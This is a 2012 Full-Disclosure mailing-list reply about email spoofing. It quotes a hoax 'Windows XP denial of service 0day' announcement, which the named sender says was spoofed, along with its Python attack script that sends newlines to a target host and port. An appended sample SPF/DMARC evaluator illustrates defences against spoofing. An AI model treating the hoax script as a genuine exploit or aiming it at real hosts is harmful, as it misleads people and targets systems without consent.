Message-Id: <20120417214848.06EFB6F454@smtp.hushmail.com>
Date: Tue, 17 Apr 2012 17:48:47 -0400
From: "Elazar Broad" <elazar@...hmail.com>
To: adam@...osecinstitute.com, full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP denial of service 0day found in CTF exercise
<snip>
Received-SPF: softfail (lists.grok.org.uk: transitioning domain of
adam@...osecinstitute.com does not designate 46.167.245.118 as
permitted sender)
Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk (Postfix) with ESMTP id D4324C0
for <full-disclosure@...ts.grok.org.uk>; Tue, 17 Apr 2012 07:58:09 +0100 (BST)
</snip>
At least configure your SPF record policy to hard fail, and consider Domain Keys and/or DMARC.
elazar
On Tuesday, April 17, 2012 at 10:40 AM, adam@...osecinstitute.com wrote:
> Guys, this is a fake release, someone spoofed my email and sent this out
> as a joke to mock the wicd release from last week. Please note that if you
> click on the links, there is nothing there concerning this.
>
> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>> Immunity Debugger Remote Denial of Service 0Day Tested against
>> version 1.76 and 1.80 on Windows XP distributions
>>
>> Has not been tested for potential privilege escalation vectors.
>>
>> We first wrote about Immunity Debugger here:
>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>
>> Discovered by a student that wishes to remain anonymous in the
>> course CTF. This 0day exploit for Windows was discovered by a
>> student in the InfoSec Institute Ethical Hacking class, during an
>> evening CTF exercise. The student wishes to remain anonymous, he
>> has contributed a python version of the 0day. A patch that can be
>> applied to Windows has not been made available. You can find a
>> python version of the exploit to copy and paste here:
>>
>>
>> #!/usr/bin/python
>> #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student
>> #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>
>> import sys
>> import os
>> import time
>> import getopt
>> import socket
>>
>> class Error(Exception):
>>     def __init__(self, error):
>>         self.errorStr=error
>>     def __str__(self):
>>         return repr(self.errorStr)
>>
>> class Exploit():
>>
>>     def __init__(self, targetHost, targetPort):
>>         self.targetHost = targetHost
>>
>>     def exploit(self, targetHost, targetPort):
>>
>>         try:
>>             socket.inet_aton(targetHost)
>>             s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>>             s.connect((targetHost,targetPort))
>>         except socket.error:
>>             raise Error("Unable to exploit (Connect failed.)")
>>             sys.exit(0)
>>
>>         # exploit
>>         try:
>>             s.sendto("\n\n\n", (targetHost, targetPort))
>>         except:
>>             raise Error("Unable to exploit (Exploit failed.)")
>>
>> def usage():
>>     print "[!] Usage:"
>>     print " ( -h, --help ):"
>>     print " Print this message."
>>     print " ( --targetHost= ): Target host."
>>     print " --targetHost=127.0.0.1"
>>     print " ( --targetPort= ): Target port."
>>     print " --targetPort=8888"
>>
>> def main():
>>     print "[$] Windows XP 0Day"
>>     try:
>>         opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", "targetPort="])
>>     except getopt.GetoptError, err:
>>         # Print help information and exit:
>>         print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
>>         usage()
>>         sys.exit(0)
>>
>>     targetHost=None
>>     targetPort=None
>>     for opt, arg in opts:
>>         if opt in ("-h", "--help"):
>>             usage()
>>             sys.exit(0)
>>         elif opt =="--targetHost":
>>             targetHost=arg
>>         elif opt =="--targetPort":
>>             targetPort=arg
>>         else:
>>             # I would be assuming to say we'll never get here.
>>             print "[!] Parameter error."
>>             usage()
>>             sys.exit(0)
>>     if not targetHost:
>>         print "[!] Parameter error: targetHost not set."
>>         usage()
>>         sys.exit(0)
>>
>>     if not targetPort:
>>         print "[!] Parameter error: targetPort not set."
>>         usage()
>>         sys.exit(0)
>>
>>     exploit = Exploit(targetHost, targetPort)
>>
>>     print "[*] Attempting to exploit:"
>>     try:
>>         exploit.exploit(targetHost, int(targetPort))
>>     except Error as error:
>>         print "[!] Exploit Error: %s" % (error.errorStr)
>>         exit(0)
>>     print "[*] Exploit appears to have worked."
>>
>> # Standard boilerplate to call the main() function to begin
>> # the program.
>> if __name__=='__main__':
>>     main()
>>
>>
>>
>> _______________________________________________ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
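
Added example (not part of the original thread): a small Python evaluator showing why the relay in the quoted Received header only earns a softfail under a "~all" SPF record, and how "-all" or an enforcing DMARC policy changes what the receiver is asked to do. The SPF and DMARC records are constructed samples for a hypothetical domain; only ip4/ip6/all terms are evaluated, and the handling of SPF results without DMARC is an assumed receiver policy.

```python
import ipaddress

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

# Constructed sample records for a hypothetical domain (not the real ones).
SPF_SOFT = "v=spf1 ip4:192.0.2.0/24 ~all"
SPF_HARD = "v=spf1 ip4:192.0.2.0/24 -all"
DMARC_REJECT = "v=DMARC1; p=reject"
RELAY_IP = "46.167.245.118"  # relay IP from the Received header quoted above


def spf_result(record, sender_ip):
    """Evaluate only the ip4/ip6/all terms of an SPF record (no DNS lookups)."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        name = name.lower()
        if name == "all":
            return QUALIFIERS[qualifier]
        if name == "ip%d" % ip.version and ip in ipaddress.ip_network(value, strict=False):
            return QUALIFIERS[qualifier]
    return "neutral"  # nothing matched and no "all" term


def dmarc_policy(record):
    """Return the p= tag of a DMARC record, or None if it is not one."""
    tags = dict(t.strip().split("=", 1) for t in record.split(";") if "=" in t)
    return tags.get("p") if tags.get("v") == "DMARC1" else None


def spoof_outcome(spf_record, dmarc_record, sender_ip):
    """(SPF result, requested handling) for unsigned mail claiming the domain."""
    spf = spf_result(spf_record, sender_ip)
    if spf == "pass":
        return spf, "accept"
    policy = dmarc_policy(dmarc_record) if dmarc_record else None
    if policy in ("quarantine", "reject"):
        return spf, policy
    # Assumption: with no enforcing DMARC policy the receiver rejects only on a hard fail.
    return spf, ("reject" if spf == "fail" else "accept")


if __name__ == "__main__":
    for spf, dmarc in [(SPF_SOFT, None), (SPF_HARD, None), (SPF_SOFT, DMARC_REJECT)]:
        print(spf, "|", dmarc, "->", spoof_outcome(spf, dmarc, RELAY_IP))
```
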